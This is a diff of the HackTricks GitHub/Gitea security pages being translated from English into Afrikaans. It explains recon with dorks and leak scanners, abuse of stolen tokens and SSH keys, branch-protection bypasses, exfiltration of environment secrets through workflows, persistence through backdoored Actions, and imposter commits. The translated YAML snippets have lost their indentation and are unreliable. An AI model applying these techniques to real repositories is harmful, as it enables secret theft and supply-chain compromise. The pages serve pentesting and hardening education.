_https://localhost:3000/\/\/settings/branches_ +Die **branch beskermings van 'n repository** kan gevind word in _https://localhost:3000/\/\/settings/branches_ > [!NOTE] -> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. +> Dit is **nie moontlik om 'n branch beskerming op organisasievlak in te stel nie**. So al hulle moet op elke repo verklaar word. 
-Different protections can be applied to a branch (like to master): +Verskillende beskermings kan op 'n tak toegepas word (soos op master): -- **Disable Push**: No-one can push to this branch -- **Enable Push**: Anyone with access can push, but not force push. -- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push) -- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs. -- **Enable Status checks:** Require status checks to pass before merging. -- **Require approvals**: Indicate the number of approvals required before a PR can be merged. -- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs. -- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass) -- **Block merge on official review requests**: If there official review requests it cannot be merged -- **Dismiss stale approvals**: When new commits, old approvals will be dismissed. -- **Require Signed Commits**: Commits must be signed. -- **Block merge if pull request is outdated** -- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes +- **Deaktiveer Push**: Niemand kan na hierdie tak push nie +- **Aktiveer Push**: Enigeen met toegang kan push, maar nie force push nie. +- **Whitelist Beperkte Push**: Slegs geselekteerde gebruikers/spanne kan na hierdie tak push (maar geen force push nie) +- **Aktiveer Merge Whitelist**: Slegs whitelisted gebruikers/spanne kan PRs saamvoeg. +- **Aktiveer Status kontroles:** Vereis dat status kontroles slaag voordat dit saamgevoeg word. +- **Vereis goedkeuring**: Dui die aantal goedkeuringe aan wat vereis word voordat 'n PR saamgevoeg kan word. +- **Beperk goedkeuringe tot whitelisted**: Dui gebruikers/spanne aan wat PRs kan goedkeur. 
+- **Blokkeer saamvoeg op verwerkte hersienings**: As veranderinge aangevra word, kan dit nie saamgevoeg word nie (selfs as die ander kontroles slaag) +- **Blokkeer saamvoeg op amptelike hersieningsversoeke**: As daar amptelike hersieningsversoeke is, kan dit nie saamgevoeg word nie +- **Verwerp verouderde goedkeuringe**: Wanneer nuwe commits gemaak word, sal ou goedkeuringe verwerp word. +- **Vereis Onderteken Commits**: Commits moet onderteken wees. +- **Blokkeer saamvoeg as die pull request verouderd is** +- **Beskermde/onbeskermde lĂȘerpatrone**: Dui patrone van lĂȘers aan om teen veranderinge te beskerm/onbeskerm. > [!NOTE] -> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. +> Soos jy kan sien, selfs al het jy daarin geslaag om 'n paar akrediteerbare inligting van 'n gebruiker te verkry, **kan repos beskerm wees wat jou verhoed om kode na master te push** byvoorbeeld om die CI/CD-pyplyn te kompromitteer. {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md index cdad12b57..5addd67ce 100644 --- a/src/pentesting-ci-cd/github-security/README.md +++ b/src/pentesting-ci-cd/github-security/README.md 
@@ -1,42 +1,42 @@ -# Github Security +# Github Veiligheid {{#include ../../banners/hacktricks-training.md}} -## What is Github +## Wat is Github -(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**. +(From [here](https://kinsta.com/knowledgebase/what-is-github/)) Op 'n hoĂ« vlak, **GitHub is 'n webwerf en wolk-gebaseerde diens wat ontwikkelaars help om hul kode te stoor en te bestuur, sowel as om veranderinge aan hul kode te volg en te beheer**. -### Basic Information +### Basiese Inligting {{#ref}} basic-github-information.md {{#endref}} -## External Recon +## Eksterne Recon -Github repositories can be configured as public, private and internal. +Github repositories kan gekonfigureer word as publiek, privaat en intern. -- **Private** means that **only** people of the **organisation** will be able to access them -- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it -- **Public** means that **all internet** is going to be able to access it. +- **Privaat** beteken dat **slegs** mense van die **organisasie** toegang sal hĂȘ +- **Intern** beteken dat **slegs** mense van die **onderneming** ( 'n onderneming kan verskeie organisasies hĂȘ) toegang sal hĂȘ +- **Publiek** beteken dat **alle internet** toegang sal hĂȘ. -In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**. +As jy die **gebruikersnaam, repo of organisasie wat jy wil teiken** ken, kan jy **github dorks** gebruik om sensitiewe inligting te vind of te soek na **sensitiewe inligting lek** **op elke repo**. 
### Github Dorks -Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**. +Github laat jou toe om **vir iets te soek deur 'n gebruiker, 'n repo of 'n organisasie as omvang te spesifiseer**. Daarom, met 'n lys van strings wat naby sensitiewe inligting gaan verskyn, kan jy maklik **soek na potensiĂ«le sensitiewe inligting in jou teiken**. -Tools (each tool contains its list of dorks): +Gereedskap (elke gereedskap bevat sy lys van dorks): -- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks)) -- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) -- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists)) +- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks lys](https://github.com/obheda12/GitDorker/tree/master/Dorks)) +- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks lys](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt)) +- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks lys](https://github.com/hisxo/gitGraber/tree/master/wordlists)) -### Github Leaks +### Github Lekke -Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits). 
+Let asseblief daarop dat die github dorks ook bedoel is om te soek na lekke deur gebruik te maak van github soekopsies. Hierdie afdeling is toegewy aan daardie gereedskap wat **elke repo sal aflaai en soek na sensitiewe inligting daarin** (selfs sekere diepte van verbintenisse nagaan). -Tools (each tool contains its list of regexes): +Gereedskap (elke gereedskap bevat sy lys van regexes): - [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks) - [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog) 
@@ -47,202 +47,190 @@ Tools (each tool contains its list of regexes): - [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets) > [!WARNING] -> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets! +> Wanneer jy soek na lekke in 'n repo en iets soos `git log -p` uitvoer, moenie vergeet daar mag **ander takke met ander verbintenisse** wees wat geheime bevat nie! -### External Forks +### Eksterne Forks -It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork). +Dit is moontlik om **repos te kompromitteer deur pull versoeke te misbruik**. Om te weet of 'n repo kwesbaar is, moet jy meestal die Github Actions yaml konfigurasies lees. [**Meer inligting hieroor hieronder**](./#execution-from-a-external-fork). -### Github Leaks in deleted/internal forks +### Github Lekke in verwyderde/intern forks -Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here: +Selfs al is dit verwyder of intern, mag dit moontlik wees om sensitiewe data van forks van github repositories te verkry. Kyk dit hier: {{#ref}} accessible-deleted-data-in-github.md {{#endref}} -## Organization Hardening +## Organisasie Versterking -### Member Privileges +### Lid Privileges -There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations//settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs). +Daar is 'n paar **standaard voorregte** wat aan **lede** van die organisasie toegeken kan word. 
Hierdie kan beheer word vanaf die bladsy `https://github.com/organizations//settings/member_privileges` of vanaf die [**Organisasies API**](https://docs.github.com/en/rest/orgs/orgs). -- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**. -- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories. -- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages. -- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it. - - _I couldn't find this info in the APIs response, share if you do_ -- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**. - - _I couldn't find this info in the APIs response, share if you do_ -- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.** - - _I couldn't find this info in the APIs response, share if you do_ -- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled. - - _I couldn't find this info in the APIs response, share if you do_ -- **More things can be configured** in this page but the previous are the ones more security related. 
+- **Basiese toestemmings**: Lede sal die toestemming None/Lees/schrijf/Admin oor die org repositories hĂȘ. Dit word aanbeveel om **None** of **Lees** te hĂȘ. +- **Repository fork**: As dit nie nodig is nie, is dit beter om **nie toe te laat** dat lede organisasie repositories fork nie. +- **Bladsy skepping**: As dit nie nodig is nie, is dit beter om **nie toe te laat** dat lede bladsye van die org repos publiseer nie. As dit nodig is, kan jy toelaat om publieke of private bladsye te skep. +- **Integrasie toegang versoeke**: Met hierdie geaktiveer sal buite medewerkers toegang kan versoek vir GitHub of OAuth apps om toegang tot hierdie organisasie en sy hulpbronne te verkry. Dit is gewoonlik nodig, maar as dit nie is nie, is dit beter om dit te deaktiveer. +- _Ek kon nie hierdie inligting in die API's antwoord vind nie, deel as jy dit doen_ +- **Repository sigbaarheid verandering**: As geaktiveer, sal **lede** met **admin** toestemmings vir die **repository** in staat wees om **sy sigbaarheid te verander**. As gedeaktiveer, kan slegs organisasie eienaars repository sigbaarhede verander. As jy **nie** wil hĂȘ mense moet dinge **publiek** maak nie, maak seker dit is **gedeaktiveer**. +- _Ek kon nie hierdie inligting in die API's antwoord vind nie, deel as jy dit doen_ +- **Repository verwydering en oordrag**: As geaktiveer, sal lede met **admin** toestemmings vir die repository in staat wees om **te verwyder** of **te oordra** publieke en private **repositories.** +- _Ek kon nie hierdie inligting in die API's antwoord vind nie, deel as jy dit doen_ +- **Laat lede toe om span te skep**: As geaktiveer, sal enige **lid** van die organisasie in staat wees om **nuwe** **spanne** te **skep**. As gedeaktiveer, kan slegs organisasie eienaars nuwe spanne skep. Dit is beter om dit gedeaktiveer te hĂȘ. 
+- _Ek kon nie hierdie inligting in die API's antwoord vind nie, deel as jy dit doen_ +- **Meer dinge kan geconfigureer word** op hierdie bladsy, maar die vorige is diegene wat meer sekuriteit gerelateerd is. -### Actions Settings +### Aksies Instellings -Several security related settings can be configured for actions from the page `https://github.com/organizations//settings/actions`. +Verskeie sekuriteit gerelateerde instellings kan geconfigureer word vir aksies vanaf die bladsy `https://github.com/organizations//settings/actions`. > [!NOTE] -> Note that all this configurations can also be set on each repository independently +> Let daarop dat al hierdie konfigurasies ook op elke repository onafhanklik gestel kan word -- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run. - - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) -- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators. - - _I couldn't find an API with this info, share if you do_ -- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository. - - _I couldn't find an API with this info, share if you do_ -- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows. 
- - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) +- **Github aksies beleid**: Dit laat jou toe om aan te dui watter repositories workflows kan uitvoer en watter workflows toegelaat moet word. Dit word aanbeveel om **te spesifiseer watter repositories** toegelaat moet word en nie alle aksies toe te laat om te loop nie. +- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization) +- **Fork pull versoek workflows van buite medewerkers**: Dit word aanbeveel om **goedkeuring vir alle** buite medewerkers te vereis. +- _Ek kon nie 'n API met hierdie inligting vind nie, deel as jy dit doen_ +- **Voer workflows uit van fork pull versoeke**: Dit is hoogs **afgerade om workflows van pull versoeke uit te voer** aangesien onderhouders van die fork oorsprong die vermoĂ« sal hĂȘ om tokens met lees toestemmings op die bron repository te gebruik. +- _Ek kon nie 'n API met hierdie inligting vind nie, deel as jy dit doen_ +- **Workflow toestemmings**: Dit word hoogs aanbeveel om **slegs lees repository toestemmings te gee**. Dit word afgerade om skryf en skep/goedkeur pull versoek toestemmings te gee om die misbruik van die GITHUB_TOKEN wat aan lopende workflows gegee word, te vermy. +- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization) -### Integrations +### Integrasies -_Let me know if you know the API endpoint to access this info!_ +_Laat weet my as jy die API eindpunt ken om hierdie inligting te bekom!_ -- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them). 
-- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them). +- **Derdeparty toepassing toegang beleid**: Dit word aanbeveel om die toegang tot elke toepassing te beperk en slegs die nodige te laat (na hersiening). +- **Gemonteerde GitHub Apps**: Dit word aanbeveel om slegs die nodige te laat (na hersiening). -## Recon & Attacks abusing credentials +## Recon & Aanvalle wat kredensiale misbruik -For this scenario we are going to suppose that you have obtained some access to a github account. +Vir hierdie scenario gaan ons veronderstel dat jy toegang tot 'n github rekening verkry het. -### With User Credentials +### Met Gebruiker Kredensiale -If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.** +As jy op een of ander manier reeds kredensiale vir 'n gebruiker binne 'n organisasie het, kan jy **net aanmeld** en kyk watter **onderneming en organisasie rolle jy het**, as jy 'n gewone lid is, kyk watter **toestemmings gewone lede het**, in watter **groepe** jy is, watter **toestemmings jy het** oor watter **repos,** en **hoe die repos beskerm word.** -Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**. +Let daarop dat **2FA dalk gebruik word** sodat jy slegs toegang tot hierdie inligting sal hĂȘ as jy ook **daardie toets kan slaag**. > [!NOTE] -> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA. 
+> Let daarop dat as jy **slaag om die `user_session` koekie te steel** (huidiglik geconfigureer met SameSite: Lax) jy kan **volledig die gebruiker naboots** sonder om kredensiale of 2FA te benodig. -Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful. +Kyk die afdeling hieronder oor [**tak beskerming omseilings**](./#branch-protection-bypass) in geval dit nuttig is. -### With User SSH Key +### Met Gebruiker SSH Sleutel -Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied). - -With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to: +Github laat **gebruikers** toe om **SSH sleutels** in te stel wat as **authentikasie metode gebruik sal word om kode** namens hulle te ontplooi (geen 2FA word toegepas nie). +Met hierdie sleutel kan jy **veranderinge in repositories waar die gebruiker sekere voorregte het, uitvoer**, egter jy kan dit nie gebruik om toegang tot die github api te verkry om die omgewing te tel nie. Jy kan egter **lokale instellings tel** om inligting oor die repos en gebruiker waartoe jy toegang het, te verkry: ```bash # Go to the the repository folder # Get repo config and current user name and email git config --list ``` +As die gebruiker sy gebruikersnaam as sy github gebruikersnaam gekonfigureer het, kan jy toegang verkry tot die **publieke sleutels wat hy in sy rekening ingestel het** in _https://github.com/\.keys_, jy kan dit nagaan om te bevestig dat die private sleutel wat jy gevind het, gebruik kan word. 
-If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\.keys_, you could check this to confirm the private key you found can be used. +**SSH sleutels** kan ook in repositories as **deploy sleutels** ingestel word. Enigeen met toegang tot hierdie sleutel sal in staat wees om **projekte vanaf 'n repository te begin**. Gewoonlik in 'n bediener met verskillende deploy sleutels sal die plaaslike lĂȘer **`~/.ssh/config`** jou inligting gee oor watter sleutel verband hou. -**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related. +#### GPG Sleutels -#### GPG Keys - -As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered. - -Check locally if the current user has any key with: +Soos verduidelik [**hier**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) is dit soms nodig om die verbintenisse te teken of jy mag ontdek word. +Kontroleer plaaslik of die huidige gebruiker enige sleutel het met: ```shell gpg --list-secret-keys --keyid-format=long ``` +### Met Gebruikerstoken -### With User Token +Vir 'n inleiding oor [**Gebruikerstokens kyk na die basiese inligting**](basic-github-information.md#personal-access-tokens). -For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens). 
+'n Gebruikerstoken kan gebruik word **in plaas van 'n wagwoord** vir Git oor HTTPS, of kan gebruik word om [**te autentiseer by die API oor Basiese Autentisering**](https://docs.github.com/v3/auth/#basic-authentication). Afhangende van die voorregte wat daaraan gekoppel is, mag jy in staat wees om verskillende aksies uit te voer. -A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions. +'n Gebruikerstoken lyk soos volg: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` -A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123` +### Met Oauth Toepassing -### With Oauth Application +Vir 'n inleiding oor [**Github Oauth Toepassings kyk na die basiese inligting**](basic-github-information.md#oauth-applications). -For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications). +'n Aanvaller mag 'n **kwaadwillige Oauth Toepassing** skep om toegang te verkry tot voorregte data/aksies van die gebruikers wat dit waarskynlik as deel van 'n phishingveldtog aanvaar. -An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +Hierdie is die [skoppe wat 'n Oauth toepassing kan versoek](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). 'n Gebruiker moet altyd die versoekte skoppe nagaan voordat dit aanvaar word. -These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them. 
+Boonop, soos verduidelik in die basiese inligting, **kan organisasies toegang tot derdeparty-toepassings gee/ontneem** tot inligting/repos/aksies wat met die organisasie verband hou. -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. +### Met Github Toepassing -### With Github Application +Vir 'n inleiding oor [**Github Toepassings kyk na die basiese inligting**](basic-github-information.md#github-applications). -For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications). +'n Aanvaller mag 'n **kwaadwillige Github Toepassing** skep om toegang te verkry tot voorregte data/aksies van die gebruikers wat dit waarskynlik as deel van 'n phishingveldtog aanvaar. -An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign. +Boonop, soos verduidelik in die basiese inligting, **kan organisasies toegang tot derdeparty-toepassings gee/ontneem** tot inligting/repos/aksies wat met die organisasie verband hou. -Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation. +## Kompromie & Misbruik Github Aksie -## Compromise & Abuse Github Action - -There are several techniques to compromise and abuse a Github Action, check them here: +Daar is verskeie tegnieke om 'n Github Aksie te kompromitteer en te misbruik, kyk hulle hier: {{#ref}} abusing-github-actions/ {{#endref}} -## Branch Protection Bypass +## Takbeskerming Omseiling -- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. 
However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way. - - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._ -- **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch. -- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**. - - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.** -- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections. -- **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. -- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. -- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). - - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. 
As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. +- **Vereis 'n aantal goedkeuringe**: As jy verskeie rekeninge gecompromitteer het, kan jy dalk net jou PR's van ander rekeninge aanvaar. As jy net die rekening het waaruit jy die PR geskep het, kan jy nie jou eie PR aanvaar nie. As jy egter toegang het tot 'n **Github Aksie** omgewing binne die repo, kan jy met die **GITHUB_TOKEN** dalk jou PR **goedkeur** en op hierdie manier 1 goedkeuring kry. +- _Let wel vir hierdie en vir die Kode-eienaars beperking dat 'n gebruiker gewoonlik nie sy eie PR's kan goedkeur nie, maar as jy dit kan, kan jy dit misbruik om jou PR's te aanvaar._ +- **Verwerp goedkeuringe wanneer nuwe verbintenisse gestuur word**: As dit nie ingestel is nie, kan jy wettige kode indien, wag totdat iemand dit goedkeur, en kwaadwillige kode plaas en dit in die beskermde tak saamvoeg. +- **Vereis hersienings van Kode-eienaars**: As dit geaktiveer is en jy is 'n Kode-eienaar, kan jy 'n **Github Aksie laat jou PR skep en dit dan self goedkeur**. +- Wanneer 'n **CODEOWNER-lĂȘer verkeerd geconfigureer is**, kla Github nie, maar dit gebruik dit nie. Daarom, as dit verkeerd geconfigureer is, is **Kode-eienaars beskerming nie van toepassing nie.** +- **Laat gespesifiseerde akteurs om takverlangings te omseil**: As jy een van hierdie akteurs is, kan jy takverlangings omseil. +- **Sluit administrateurs in**: As dit nie ingestel is nie en jy is 'n admin van die repo, kan jy hierdie takbeskermings omseil. +- **PR Hijacking**: Jy mag in staat wees om **die PR van iemand anders te wysig** deur kwaadwillige kode by te voeg, die resulterende PR self goed te keur en alles saam te voeg. +- **Verwyder Takbeskermings**: As jy 'n **admin van die repo is, kan jy die beskermings deaktiveer**, jou PR saamvoeg en die beskermings terugstel. 
+- **Omseiling van drukbeskermings**: As 'n repo **slegs sekere gebruikers toelaat** om druk (kode saam te voeg) in takke te stuur (die takbeskerming mag al die takke beskerm deur die wildcard `*` te spesifiseer). +- As jy **skryftoegang oor die repo het, maar jy mag nie kode druk nie** weens die takbeskerming, kan jy steeds **'n nuwe tak skep** en binne dit 'n **github aksie skep wat geaktiveer word wanneer kode gestuur word**. Aangesien die **takbeskerming nie die tak sal beskerm totdat dit geskep is nie**, sal hierdie eerste kode druk na die tak die **github aksie** uitvoer. -## Bypass Environments Protections +## Omseiling van Omgewingsbeskermings -For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments). +Vir 'n inleiding oor [**Github Omgewing kyk na die basiese inligting**](basic-github-information.md#git-environments). -In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one). - -Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**. +In die geval dat 'n omgewing **van al die takke toegang kan verkry**, is dit **nie beskerm nie** en jy kan maklik toegang verkry tot die geheime binne die omgewing. 
Let daarop dat jy repos mag vind waar **al die takke beskerm is** (deur hul name te spesifiseer of deur `*` te gebruik) in daardie scenario, **vind 'n tak waar jy kode kan druk** en jy kan die geheime **uitvoer** deur 'n nuwe github aksie te skep (of een te wysig). +Let daarop dat jy die randgeval mag vind waar **al die takke beskerm is** (deur wildcard `*`) en dit is gespesifiseer **wie kode na die takke kan druk** (_jy kan dit in die takbeskerming spesifiseer_) en **jou gebruiker is nie toegelaat nie**. Jy kan steeds 'n pasgemaakte github aksie uitvoer omdat jy 'n tak kan skep en die druktrigger oor homself kan gebruik. Die **takbeskerming laat die druk na 'n nuwe tak toe, so die github aksie sal geaktiveer word**. ```yaml push: # Run it when a push is made to a branch - branches: - - current_branch_name #Use '**' to run when a push is made to any branch +branches: +- current_branch_name #Use '**' to run when a push is made to any branch ``` +Let wel dat **na die skepping** van die tak die **takbeskerming op die nuwe tak sal van toepassing wees** en jy dit nie sal kan wysig nie, maar teen daardie tyd sal jy reeds die geheime afgelaai het. -Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets. 
+## Volharding -## Persistence +- Genereer **gebruikertoken** +- Steel **github tokens** van **geheime** +- **Verwydering** van werkvloei **resultate** en **takke** +- Gee **meer regte aan die hele organisasie** +- Skep **webhooks** om inligting te eksfiltreer +- Nooi **buitelandse samewerkers** +- **Verwyder** **webhooks** wat deur die **SIEM** gebruik word +- Skep/wysig **Github Action** met 'n **terugdeur** +- Vind **kwulnerbare Github Action vir opdraginjekie** deur **geheime** waarde wysiging -- Generate **user token** -- Steal **github tokens** from **secrets** - - **Deletion** of workflow **results** and **branches** -- Give **more permissions to all the org** -- Create **webhooks** to exfiltrate information -- Invite **outside collaborators** -- **Remove** **webhooks** used by the **SIEM** -- Create/modify **Github Action** with a **backdoor** -- Find **vulnerable Github Action to command injection** via **secret** value modification +### Imposter Commits - Terugdeur via repo commits -### Imposter Commits - Backdoor via repo commits - -In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**. - -Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): +In Github is dit moontlik om **'n PR na 'n repo van 'n fork te skep**. Selfs al word die PR **nie aanvaar nie**, sal 'n **commit** id binne die oorspronklike repo geskep word vir die fork weergawe van die kode. Daarom **kan 'n aanvaller 'n spesifieke commit van 'n blykbaar legitieme repo wat nie deur die eienaar van die repo geskep is nie, vaspen**. 
+Soos [**dit**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e): ```yaml name: example on: [push] jobs: - commit: - runs-on: ubuntu-latest - steps: - - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e - - shell: bash - run: | - echo 'hello world!' +commit: +runs-on: ubuntu-latest +steps: +- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e +- shell: bash +run: | +echo 'hello world!' ``` - -For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) +Vir meer inligting, kyk na [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md index c5ce0467b..50e3f1b2b 100644 --- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md +++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md 
